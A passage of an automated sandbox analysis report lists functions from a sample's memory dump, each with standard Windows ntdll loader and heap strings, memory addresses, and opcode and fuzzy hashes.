                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-1334570610
                                                                    • Opcode ID: aa0461fbf3480cbb36599f6c36cf504b746701bdd5fcc1cae7b6a919ab3504f5
                                                                    • Instruction ID: d545b02abec5bf9cb60bebe3f54e6ecafcc79e5bfa982a5630f508fbb708996e
                                                                    • Opcode Fuzzy Hash: aa0461fbf3480cbb36599f6c36cf504b746701bdd5fcc1cae7b6a919ab3504f5
                                                                    • Instruction Fuzzy Hash: CF61B170610306DFDB29CF28C844B6ABBE6FF45708F14895EE4598F296D774E881CB92
                                                                    Function 015BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015F82E8
                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 015F82DE
                                                                    • Failed to reallocate the system dirs string !, xrefs: 015F82D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1783798831
                                                                    • Opcode ID: b7946ca24e58d607bb95c357a9088e128b8d4d5e9d7aa51de909dda720c01a01
                                                                    • Instruction ID: 16b12e64edfd0e498f497d7c667fc80a394557d795c82e9724a3637ba2514956
                                                                    • Opcode Fuzzy Hash: b7946ca24e58d607bb95c357a9088e128b8d4d5e9d7aa51de909dda720c01a01
                                                                    • Instruction Fuzzy Hash: 4241F171564312ABD725EB68DC84F9F77E8FF84750F00492EB948DB2A0E770E8108B96
                                                                    Function 0163C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • PreferredUILanguages, xrefs: 0163C212
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0163C1C5
                                                                    • @, xrefs: 0163C1F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    • API String ID: 0-2968386058
                                                                    • Opcode ID: e45f0c7fabd0970a77beb0c5534d48a75167c3fc7901bffd3ddbec819e4ce629
                                                                    • Instruction ID: 1a6a77bf99c6118397b52218ced05ad688a74b9744f4a104038a342cb4bd4c51
                                                                    • Opcode Fuzzy Hash: e45f0c7fabd0970a77beb0c5534d48a75167c3fc7901bffd3ddbec819e4ce629
                                                                    • Instruction Fuzzy Hash: FA415372E1021AAFDF11DED8CC51BEEBBB8BB94704F14806BEA05B7240D7749A458B90
                                                                    Function 01614144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                    • API String ID: 0-1373925480
                                                                    • Opcode ID: 7bf1b5a9323fdc68bd300878d7cb2ef68693138098cebd02150488c347c06284
                                                                    • Instruction ID: 445d09a81a93f1fe7bece7f055ca76ffc392adbdd24e65d3d36af2c15cb1e548
                                                                    • Opcode Fuzzy Hash: 7bf1b5a9323fdc68bd300878d7cb2ef68693138098cebd02150488c347c06284
                                                                    • Instruction Fuzzy Hash: CD410231A00659CBEB26DBA9CC50BADBBB8FF95340F280459D901EF785DB358942CB51
                                                                    Function 01604755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01604888
                                                                    • LdrpCheckRedirection, xrefs: 0160488F
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01604899
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-3154609507
                                                                    • Opcode ID: 00aa256f3593e3539f3772546915bb60d25dceac0aaf083e8195550f7db0bfc3
                                                                    • Instruction ID: f2dcec9adc02ed7d124fc5e0ffbc2ed0774e308123aad54f42d9cd2ddcd3937b
                                                                    • Opcode Fuzzy Hash: 00aa256f3593e3539f3772546915bb60d25dceac0aaf083e8195550f7db0bfc3
                                                                    • Instruction Fuzzy Hash: 3A41C332A046519FDB3BCE58DC40A27BBE9BF89690B06095DEF459B391DB30D910CB91
                                                                    Function 01590BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-2558761708
                                                                    • Opcode ID: 36258c1ec36be3d05074d9d32839ce1dd9f5b6ce2c486bc86d9dccc3c26d3cd1
                                                                    • Instruction ID: b8bfea66a16da34ceacab1ac221ddcd8984cfa6693f99876c9f87995ebbd1a5d
                                                                    • Opcode Fuzzy Hash: 36258c1ec36be3d05074d9d32839ce1dd9f5b6ce2c486bc86d9dccc3c26d3cd1
                                                                    • Instruction Fuzzy Hash: 1711E1313241029FDB2DDA28D859B7EB3EAFF8061AF188959F406CF291EB34D841C752
                                                                    Function 016020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Process initialization failed with status 0x%08lx, xrefs: 016020F3
                                                                    • LdrpInitializationFailure, xrefs: 016020FA
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01602104
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2986994758
                                                                    • Opcode ID: 10a1463496d66cd673e0a286a71e7c1012916b7ee6f0cd1d51f716c1f0ba39ab
                                                                    • Instruction ID: 97ba1d2387d362eeb02bd590e5aa8adc81a68e925127d6f373f278b86c6ba9c7
                                                                    • Opcode Fuzzy Hash: 10a1463496d66cd673e0a286a71e7c1012916b7ee6f0cd1d51f716c1f0ba39ab
                                                                    • Instruction Fuzzy Hash: E7F02234640309ABE728EA4CCC66FAA776CFB80B44F5000ADFB407B3C1D3B0A950CA81
                                                                    Function 015903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    • API String ID: 48624451-232158463
                                                                    • Opcode ID: 3d6e974c0881f678e3373c8b71be2fcf0e7280d15a9c78e95cedbb50d1006252
                                                                    • Instruction ID: f987cba6ae3ee9108cbee3b49fcf58a3eea2bf2d3e37b1ca5c7b472a377b411d
                                                                    • Opcode Fuzzy Hash: 3d6e974c0881f678e3373c8b71be2fcf0e7280d15a9c78e95cedbb50d1006252
                                                                    • Instruction Fuzzy Hash: 89714C71A0014A9FDF05DFA8C994BAEB7F8FF48744F144469E905EB291EA34ED01CBA1
                                                                    Function 0158A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrResSearchResource Enter, xrefs: 0158AA13
                                                                    • LdrResSearchResource Exit, xrefs: 0158AA25
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                    • API String ID: 0-4066393604
                                                                    • Opcode ID: 3233c09afa60731e88e34a0599f454df8af4e496527e2a31397aa4bde73d0600
                                                                    • Instruction ID: 2d55b25de97fd0d2d738ddac77936953d27ad15e235f824af5b73638d76d3e16
                                                                    • Opcode Fuzzy Hash: 3233c09afa60731e88e34a0599f454df8af4e496527e2a31397aa4bde73d0600
                                                                    • Instruction Fuzzy Hash: 88E17F71E002199FEB26EE99C984BAEBBFABF44310F14442AE911FF251E774D941CB50
                                                                    Function 0164A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction ID: 9977c6cd91cbb98124f0dec6a230d477e1c6774a61952aa828d2f2ccb84aeb37
                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction Fuzzy Hash: 37C1B031244342ABEB25CFA8CC41B6BBBE5BFD4318F084A2DF6968B291D774D505CB81
                                                                    Function 015FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: 43603726f1a247299a502663f3a21ac8ec4652239c1f684400880ade6c7986fc
                                                                    • Instruction ID: 1dfe711457dca4eb577eb24273c86bee0f4b52bc9a7912821e4fa56595882210
                                                                    • Opcode Fuzzy Hash: 43603726f1a247299a502663f3a21ac8ec4652239c1f684400880ade6c7986fc
                                                                    • Instruction Fuzzy Hash: 31614B71E016099FDB25DFA8C881BAEBBF9FB88700F15446DE649EF261D731A900CB50
                                                                    Function 016243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$MUI
                                                                    • API String ID: 0-17815947
                                                                    • Opcode ID: db64079c36fc884123dddcff901bd282a50bd41bd061bbb02e73c3232083bcbe
                                                                    • Instruction ID: d119e48e497d9c851e43f6320a9ede27d6b4ef1e0e2b77f1f064688b378a667c
                                                                    • Opcode Fuzzy Hash: db64079c36fc884123dddcff901bd282a50bd41bd061bbb02e73c3232083bcbe
                                                                    • Instruction Fuzzy Hash: E2510971D00A2EAEDF11DFE9CC90AEEBBB8FB44754F104529E611BB290DB309905CB60
                                                                    Function 015804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0158063D
                                                                    • kLsE, xrefs: 01580540
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                    • API String ID: 0-2547482624
                                                                    • Opcode ID: db934c9d750ad61cec3ebf0add2ad8170e7bc3c5c24a848032a4c9d84b907b75
                                                                    • Instruction ID: 36cc882c304cf234c7df120cafe188f4daf48505c765699b64ec9e8b96c960aa
                                                                    • Opcode Fuzzy Hash: db934c9d750ad61cec3ebf0add2ad8170e7bc3c5c24a848032a4c9d84b907b75
                                                                    • Instruction Fuzzy Hash: 5C51AF715047428FD724FF69C5406ABBBE4BF85304F14483EFAAA9B281E770D549CBA2
                                                                    Function 0158A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0158A2FB
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0158A309
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    • API String ID: 0-2876891731
                                                                    • Opcode ID: 795636caf06278c9b55d40867b5e187fd75e4fa67cb3dab1403d82dddb9f4631
                                                                    • Instruction ID: ae4f2506cc88bc4d1573e67e96f56bff8067ebd2b2f64a3967473f456e2e988e
                                                                    • Opcode Fuzzy Hash: 795636caf06278c9b55d40867b5e187fd75e4fa67cb3dab1403d82dddb9f4631
                                                                    • Instruction Fuzzy Hash: 7D41BE31A04649DBDB26EF69C844B6E7BF8FF84700F1444AAE904EF295EBB5D900CB50
                                                                    Function 015BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Cleanup Group$Threadpool!
                                                                    • API String ID: 2994545307-4008356553
                                                                    • Opcode ID: bc3cdfbb0dea68ca17934c1cc8ac99cce9a834ab7a165b891628feb94f85e48b
                                                                    • Instruction ID: a208305bb56e9360db85f05d53735aa916559a6c84a001ee0ee59fca57942857
                                                                    • Opcode Fuzzy Hash: bc3cdfbb0dea68ca17934c1cc8ac99cce9a834ab7a165b891628feb94f85e48b
                                                                    • Instruction Fuzzy Hash: 6701D1B2654700AFE311DF24CD85B567BF8F794B15F008939A649CB190E774E904CB46
                                                                    Function 0158C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: MUI
                                                                    • API String ID: 0-1339004836
                                                                    • Opcode ID: 3b17f51801ead4ce10d2fb591d8d270354bdf30602ebbad6b4ce89811a6374b6
                                                                    • Instruction ID: 49edf4023579e35a8524378b5406eb29e8af3d6d6724ece976602a75dc5cfc6b
                                                                    • Opcode Fuzzy Hash: 3b17f51801ead4ce10d2fb591d8d270354bdf30602ebbad6b4ce89811a6374b6
                                                                    • Instruction Fuzzy Hash: D1824B75E002198FEB25EFA9C880BEDBBF5BF48310F148169E959BF291DB709941CB50
                                                                    Function 01606420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: c6d11e04c7c52f53e704695b56b8dc80e8e4c2f09aac3e3f7655b56dca40b821
                                                                    • Instruction ID: 3b9765f73abbd5f96df46835cf7d1d0a7c77569c869b20ee6592dde8dfc56f98
                                                                    • Opcode Fuzzy Hash: c6d11e04c7c52f53e704695b56b8dc80e8e4c2f09aac3e3f7655b56dca40b821
                                                                    • Instruction Fuzzy Hash: FD916F7194021AAFEB26DF95CC85FAF7BB8FF44B50F500055F600AB290D775A910CBA1
                                                                    Function 0162E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: a33e989764b9a047e60f923bed4262a6878177281cbbaaec235b9e8443393693
                                                                    • Instruction ID: c00248d398533bf3942ac9a197d3de5c8bf38cd09ece8995d9f2c2796a068c2a
                                                                    • Opcode Fuzzy Hash: a33e989764b9a047e60f923bed4262a6878177281cbbaaec235b9e8443393693
                                                                    • Instruction Fuzzy Hash: E191AF31901A1AAEDF22AFA5DC44FEFBB79FF85740F100029F505AB250E7769902CB91
                                                                    Function 015BA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GlobalTags
                                                                    • API String ID: 0-1106856819
                                                                    • Opcode ID: 785b19d58420e9fa9ecb98414162fad83e7e232a1895ba141abf6b172dce900a
                                                                    • Instruction ID: 4a02d958f376e026495693f1bfe50c2c06f27eb24370b4d5e9d4d06a5a4a0c8b
                                                                    • Opcode Fuzzy Hash: 785b19d58420e9fa9ecb98414162fad83e7e232a1895ba141abf6b172dce900a
                                                                    • Instruction Fuzzy Hash: 2D716FB5E0121A9FDF28CF9CC9906ADBBF2BF88700F14852EE605AB241E7319941CB50
                                                                    Function 01624978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .mui
                                                                    • API String ID: 0-1199573805
                                                                    • Opcode ID: ac4efbec876687ec5e0f6517a18c3091a9c0cdd0795f3da781d72da052636f22
                                                                    • Instruction ID: a707b989bf1d38641e180741db07ffef8744094a7f1391b7de68049f2374439c
                                                                    • Opcode Fuzzy Hash: ac4efbec876687ec5e0f6517a18c3091a9c0cdd0795f3da781d72da052636f22
                                                                    • Instruction Fuzzy Hash: 20518172D0063A9BDF11DFA9DC40AAEBBB4BF58A10F05416AED15BB344DB349801CFA4
                                                                    Function 0159E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: EXT-
                                                                    • API String ID: 0-1948896318
                                                                    • Opcode ID: 6fc1956c8206f6b1f50a64172640dc346c1095048f11d89d8a2de14e9336215a
                                                                    • Instruction ID: 910c1bacb9959da1cff7a0c3340f86477c32e12eb19662867add204aca9012f7
                                                                    • Opcode Fuzzy Hash: 6fc1956c8206f6b1f50a64172640dc346c1095048f11d89d8a2de14e9336215a
                                                                    • Instruction Fuzzy Hash: 41417F72508382ABDB11DB75C981B6FBBE8FF88614F44092EF985EF180E674D9048793
                                                                    Function 015FC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: 9ea3bad02c68a348215b6ce8c4b63e4c70f7c6d0a282bfdae9d990de1171289d
                                                                    • Instruction ID: b854ad2f5c91f87f435660dbb7fa0ec606e067127f06acd75cc974bbbb9bc782
                                                                    • Opcode Fuzzy Hash: 9ea3bad02c68a348215b6ce8c4b63e4c70f7c6d0a282bfdae9d990de1171289d
                                                                    • Instruction Fuzzy Hash: 6E4115B1D0152EAEDB21DA50CC84FDEB77CBB55714F0045A9E708AF140DB709E898FA4
                                                                    Function 01616B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: 356ce0f4e460b656d0e355dd3868c09d4611ea99d67d731ee48da4c3451739be
                                                                    • Instruction ID: e2ac6c36fc10aae724ad2db1206ea49683a8d43017916d16fd0f9eec3b708e89
                                                                    • Opcode Fuzzy Hash: 356ce0f4e460b656d0e355dd3868c09d4611ea99d67d731ee48da4c3451739be
                                                                    • Instruction Fuzzy Hash: 0F310635A0075A9BEB22DF69CC50BEE7BB8EF54704F18406CE941AF286D7B5D805CB50
                                                                    Function 015FCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: 414f8d2c967468acfd740356e43fa999b1707d53f3913264af3c78a2bdffd316
                                                                    • Instruction ID: 436085f0eada90aa183d8f1714daa92bad939a1a51809101020683e817aba007
                                                                    • Opcode Fuzzy Hash: 414f8d2c967468acfd740356e43fa999b1707d53f3913264af3c78a2bdffd316
                                                                    • Instruction Fuzzy Hash: DD31D43A90051EAFEB16DB59C845E6FBBB4FB80710F01457DAA05AF250D7309E04D7E0
                                                                    Function 0160892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0160895E
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                    • API String ID: 0-702105204
                                                                    • Opcode ID: f7896ca668cfc788b13e198cfe143a02d8751e64d9e24a4848e8ac30e78a10fe
                                                                    • Instruction ID: c2972b023b6a6d0bbb6da1fae65e85c6eaae0adc6d6378fae9862f8896a803f8
                                                                    • Opcode Fuzzy Hash: f7896ca668cfc788b13e198cfe143a02d8751e64d9e24a4848e8ac30e78a10fe
                                                                    • Instruction Fuzzy Hash: 7801F731B102029FE72EFA5D9C84A5B7B69FF85354B05105CF64217691CB206C51C7D6
                                                                    Function 01622000 Relevance: .8, Instructions: 757COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 19f17fc3d8a165792b4984205c72e32bd8325c3fa8e9bccfd685e4f6157a7aff
                                                                    • Instruction ID: 6d6b4b4d0f9184b57b4523fc9b941ac545b8d9b68741f1b139e08467d95daaf5
                                                                    • Opcode Fuzzy Hash: 19f17fc3d8a165792b4984205c72e32bd8325c3fa8e9bccfd685e4f6157a7aff
                                                                    • Instruction Fuzzy Hash: B142C031608B518FD725CF68CCA0A6BBBE5BB88700F08492DFA829B350D775D945CF52
                                                                    Function 01618158 Relevance: .6, Instructions: 617COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5013c8998db984cbcd8ef79a0395227e55ed0ed373b693704f7dd10fd4767619
                                                                    • Instruction ID: 0f577c6363f75b430f573ef9f336122a417f5a9fa2874da038958ebe5cb2e636
                                                                    • Opcode Fuzzy Hash: 5013c8998db984cbcd8ef79a0395227e55ed0ed373b693704f7dd10fd4767619
                                                                    • Instruction Fuzzy Hash: 30424D75E002198FEB25CF69CC81BADBBF9BF88300F198199E949EB245D7349985CF50
                                                                    Function 01592840 Relevance: .6, Instructions: 605COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2b7c55084d3fc4fd80ef9cedf271f227899e41f0012712ab3d0d8e839e81cb8
                                                                    • Instruction ID: f54751e716a2f346d1c1ffa28ee8f0fafb8239f71f923a8a21d49f6bf372e9b3
                                                                    • Opcode Fuzzy Hash: c2b7c55084d3fc4fd80ef9cedf271f227899e41f0012712ab3d0d8e839e81cb8
